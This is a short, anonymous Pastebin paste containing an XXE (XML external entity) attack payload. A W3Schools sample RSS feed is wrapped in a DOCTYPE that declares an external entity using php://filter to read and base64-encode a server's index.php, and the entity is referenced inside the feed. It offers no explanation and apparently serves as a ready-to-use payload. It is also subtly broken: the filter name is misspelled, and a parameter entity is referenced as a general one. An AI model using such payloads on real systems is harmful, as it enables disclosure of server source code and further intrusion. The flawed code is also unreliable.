Advertisement
Guest User

Untitled

a guest
Jan 20th, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=index.php" >
  5. ]>
  6.  
  7. <rss version="2.0">
  8.  
  9. <channel>
  10. <foo>&xxe;</foo>
  11. <title>W3Schools Home Page</title>
  12. <link>https://www.w3schools.com</link>
  13. <description>Free web building tutorials</description>
  14. <item>
  15. <title>RSS Tutorial</title>
  16. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  17. <description>New RSS tutorial on W3Schools</description>
  18. </item>
  19. <item>
  20. <title>XML Tutorial</title>
  21. <link>https://www.w3schools.com/xml</link>
  22. <description>New XML tutorial on W3Schools</description>
  23. </item>
  24. </channel>
  25.  
  26. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement